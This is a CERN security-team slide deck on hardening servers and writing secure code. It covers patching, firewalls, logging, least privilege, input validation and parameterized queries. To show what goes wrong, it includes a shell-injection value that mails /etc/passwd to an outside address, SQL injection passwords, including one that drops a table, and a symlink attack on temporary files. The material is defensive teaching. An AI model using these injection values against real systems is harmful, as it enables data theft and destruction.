securing your servers and code (and how we can help you)

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Securing your servers and code (and how we can help you). Sebastian Lopienski CERN Computer Security Team. Outline. How to secure your servers How to secure your code How the Computer Security Team can help you. Things to avoid. Security measures that can be easily bypassed. Part 1:. - PowerPoint PPT Presentation

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Sebastian LopienskiCERN Computer Security Team

Securing your servers and code(and how we can help you)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 2

Outline

►How to secure your servers

►How to secure your code

►How the Computer Security Team can help you

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 3

Things to avoid

Security measures that

can be easily bypassedSecurity measures that

can be easily bypassed

How to secure your servers

Part 1:

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 5

Checklist

1. Harden the OS and Applications

2. Keep the OS and Applications up-to-date

3. Use a local firewall

4. Take advantage of the logs

5. Ensure that all passwords are secure

6. Take extra precautions for privileged accesses

7. Use security products when relevant

8. Take into account physical security

9. Keep your security knowledge up-to-date.

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 6

1. Harden the OS & applications

►minimise the number of

packages installed

accounts enabled

network services offered privileged processes running

(this includes running with least privileges whenever possible)

► tighten the configuration of the major services (this includes limiting access to the minimum)

Why?► to limit exposure ► to limit number of components that you have to secure

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 7

2. Keep the OS & apps updated

► install all the security patches as soon as possible

► ideally, use a system that automates patching

this applies to the OS and to all the software installed on the server, and especially to network services

Why?► to close known vulnerabilities in OS and software►and to make sure that patching is not forgotten in the future

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 8

3. Use a local firewall

► install a local firewall configured to only allow what is expected (i.e. default policy is deny)

► ideally, also filter outgoing network traffic

Why?► to limit exposure (by restricting incoming traffic)► to prevent criminals using backdoors and remote access

(by restricting incoming and outgoing traffic)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 9

4. Take advantage of the logs

►select appropriate logging levels for all sensitive components

► frequently review the logs to detect suspicious activity

► ideally, store the logs remotely to avoid tampering e.g. to Central Security Logging service

http://cern.ch/security/services/en/csl.shtml

Why?► to detect attacks and incidents► to be able to investigate them (find reasons, and learn from them)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 10

Things to avoid

Security measures that get disabled with time, when new features are installed

Security measures that get disabled with time, when new features are installed

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 11

►make sure that the passwords used are good enough

(ideally, enforce this with the appropriate tools)

the passwords are not exposed (this includes using encrypted protocols such as https, or services like SINDES)

the passwords are changed regularly

this applies also to other authentication methods, e.g. SSH keys

Why?►because weak and badly protected passwords

are very common attack vectors

5. Ensure password security

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 12

6. Precautions for privileged access

► restrict privileged accesses to the bare minimum

►use delegation to minimise the number of operations requiring full privileges (for instance use sudo on Unix/Linux)

► log all actions executed with system privileges

Why?►because privileged access is what criminals are after

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 13

7. Use relevant security products

►anti-virus(ideally, with automatic signature update)

► Intrusion Detection Systems(both host-based and network-based)

► integrity checkers to detect system modifications

e.g. rpm –V, Tripwire, rkhunter, chkrootkit;see also http://cern.ch/security/faq/en/rootkits.shtml

Why?►because they help prevent and detect intrusions

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 14

Things to avoid

Security solutions

that do not cover the

whole exposure areaSecurity solutions

that do not cover the

whole exposure area

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 15

8. Physical access

► take into account physical security (when relevant)

Why?►because malicious person with physical access

can bypass most protections (e.g. directly log in as root)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 16

9. Security knowledge

►keep your security knowledge up-to-date

visit http://cern.ch/security/reports to read/watch: monthly security reports for CERN security reports from SWITCH CERT various presentations etc.

follow security training,

or just contact Computer.Security@cern.ch

Why?► to learn about threats, attack vectors etc.,

and protect yourself - before they affect you

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 17

Be lazy, and delegate!

If you manage a server for your experiment,consider making it a VOBOX

►many of the points discussed above will be done for you !►contact your VO Coordinator for details

How to secure your code

Part 2:

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 19

Software is vulnerable

Vulnerabilities

reported yesterdayVulnerabilities

reported yesterday

Fro

m

secu

nia

.co

m

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 20

When to start?

Security should be foreseen as part of the system from the very beginning, not added as a layer at the end► the latter solution produces insecure code

(tricky patches instead of neat solutions)► it may limit functionality ►and will cost much more

You can’t add security

in version 2.0You can’t add security

in version 2.0

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 21

Software life-cycle

requirements

design

implementation

testing

deployment

maintenance

Security must be

part of all these

phases!

Security must be

part of all these

phases!

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 22

Architecture

►Modularity: divide program into semi-independent parts►small, well-defined interfaces to each module/function

► Isolation: ►each part should work correctly even if others fail

(return wrong results, send requests with invalid arguments)

►Defense in depth: build multiple layers of defense

►Simplicity (complex => insecure)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 23

Multiple layers of defense

XIII century

XXI century

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 24

Complexity

Sys

tem

cal

ls i

n A

pac

he

Sys

tem

cal

ls i

n A

pac

he

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 25

Complexity

Sys

tem

cal

ls i

n I

ISS

yste

m c

alls

in

IIS

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 26

Design – (some) golden rules

Make security-sensitive parts of your code small

Least privilege principle►program should run on the least privileged account possible►same for accessing databases, files etc.► revoke a privilege when it is not needed anymore

Choose safe defaults; deny by default

Fail gracefully and securely

Question again your assumptions, decisions etc.

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 27

Things to avoid

Procedures or docs that

are impossible to follow;

code impossible to maintainProcedures or docs that

are impossible to follow;

code impossible to maintain

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 28

Implementation

@P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{@p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f|

ord($p{$_})&6];$p{$_}=/^$P/ix?$P:close$_}keys

%p}p;p;p;p;p;map{$p{$_}=~/^[P.]/&& close$_}%p;wait until$?; map{

/^r/&&<$_>}%p;$_=$d[$q];sleep rand(2) if/\S/;print

@P=split//,".URRUU\c8R";@d=split//,"\nrekcah xinU / lreP rehtona tsuJ";sub p{@p{"r$p","u$p"}=(P,P);pipe"r$p","u$p";++$p;($q*=2)+=$f=!fork;map{$P=$P[$f|

ord($p{$_})&6];$p{$_}=/^$P/ix?$P:close$_}keys

%p}p;p;p;p;p;map{$p{$_}=~/^[P.]/&& close$_}%p;wait until$?; map{

/^r/&&<$_>}%p;$_=$d[$q];sleep rand(2) if/\S/;print

►What does this code do?►Would you like to work on it?► Is it secure?

Write good quality, maintainable, self-documenting code!

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 29

Enemy number one: Input data

►Don’t trust input data – input data is the single most common reason of security-related incidents

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 30

Enemy #1: Input data (cont.)

Example: your script sends e-mails with the following shell command:cat confirmation | mail $email

and someone provides the following e-mail address:me@fake.com; cat /etc/passwd | mail me@real.com

cat confirmation | mail me@fake.com;

cat /etc/passwd | mail me@real.com

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 31

Enemy #1: Input data (cont.)

Example (SQL Injection): your webscript authenticates users against a database:

select count(*) from users where name = ’$name’ and pwd = ’$password’;

but an attacker provides one of these passwords:

anything’ or ’x’ = ’x

XXXXX’; drop table users; --

select count(*) from users where name = ’$name’ and pwd = ’anything’ or ’x’ = ’x’;

select count(*) from users where name = ’$name’ and pwd = ’XXXXX’; drop table users; --’;

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 32

Input validation

Input validation is crucial

Consider all input dangerous until proven valid

Default-deny rule►allow only “good” characters and formulas and reject others

(instead of looking for “bad” ones)

►use regular expressions

Validation at different levels:►at input data entry point

► right before taking security decisions based on that data

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 33

Coding – advice (cont.)

Separate data from code:►Careful with shell and eval function

►sample line from a Perl script: system(”rpm –qpi $filename”);but what if $filename contains illegal characters: | ; ` \

►popen() also invokes the shell indirectly►same for open(FILE, ”grep –r $needle |”);►similar: eval() function (evaluates a string as code)

►Use parameterized SQL queries to avoid SQL injection:

$query = ”select count(*) from users where name = $1 and pwd = $2”;

pg_query_params($connection, $query, array($login, $password));

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 34

Temporary file – or is it?►symbolic link attack: someone guesses the name of your temporary

file, and creates a link from it to another file (i.e. /bin/bash)

►good temporary file has a name that is hard to guess►use tmpfile() (C/C++), mktemp shell command or similar

Coding – advice (cont.)

/tmp/mytmpfile /bin/bash

/root/myscript.sh

writes data

symbolic link

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 35

Source code static analysis tools

Tools that analyse source code, and look for potential:►security holes► functionality bugs (including those not security related)

Recommendations for C/C++, Java, Python, Perl, PHPavailable at http://cern.ch/security/recommendations/en/code_tools.shtml►RPMs provided, some available on LXPLUS► trivial to use

There is no magic:►even the best tool will miss most non-trivial errors► they will just report the findings, but won’t fix the bugs

Still, using code analysis tools is highly recommended!

These tools will help you

develop better codeThese tools will help you

develop better code

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 36

Code tools: FindBugs / Java

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 37

Code tools: pychecker / Python

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 38

Code tools: Pixy / PHP

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 39

Things to avoid

Security toolsthat are disabled, or impossible to use

Security toolsthat are disabled, or impossible to use

How the Computer Security Team can help you

Part 3:

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 41

Things to avoid

Incomplete protection measures that become “temporary” forever

Incomplete protection measures that become “temporary” forever

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 42

How we(*) can help you

(*) we = CERN Computer Security Team

Web and machine scanning► vulnerability assessment – black box testing► automatic scans, but also on demand (Computer.Security@cern.ch)

source code tools

Central Logging Service

training courses

security audits and risk assessment

(plus of course intrusion detection, incident investigation and response etc.)

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 43

Training

Security courses available at CTA (http://cta.cern.ch)

freefree

freefree

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 44

Audits, risks assessments etc.

The Computer Security Team can assist you with:►Threat modelling and risk assessment

to ensure that risks are correctly managed, and no major threat is neglected

►Designing system security architecture when starting a new system or software project

►Security code reviews before deploying developed code

►Security audits of existing systems when maintaining existing systems or software

Don’t hesitate to contact Computer.Security@cern.ch

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 45

The new Web site

Check out our new Web site

http://cern.ch/security

Dr. Stefan Lüders (CERN IT/CO) ― DESY ― 20. Februar 2007Computer.Security@cern.ch — “Computer Security Day” — slide 46

Thank you

Any questions?

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